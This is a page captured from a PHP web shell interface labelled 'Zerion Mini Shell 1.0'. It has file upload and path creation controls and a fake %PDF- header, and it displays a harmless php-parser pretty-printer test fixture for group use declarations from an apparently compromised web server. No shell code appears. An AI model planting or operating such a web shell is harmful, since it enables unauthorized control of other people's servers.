%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/zgjedhjet2017/vendor/nikic/php-parser/test/code/prettyPrinter/stmt/
Upload File :
Create Path :
Current File : /var/www/html/zgjedhjet2017/vendor/nikic/php-parser/test/code/prettyPrinter/stmt/groupUse.test

Group use declaration
-----
<?php
use A\{B};
use A\{B\C, D};
use A\B\{C\D, E};
use function A\{b\c, d};
use const A\{B\C, D};
use A\B\{C\D, function b\c, const D};
-----
use A\{B};
use A\{B\C, D};
use A\B\{C\D, E};
use function A\{b\c, d};
use const A\{B\C, D};
use A\B\{C\D, function b\c, const D};

Zerion Mini Shell 1.0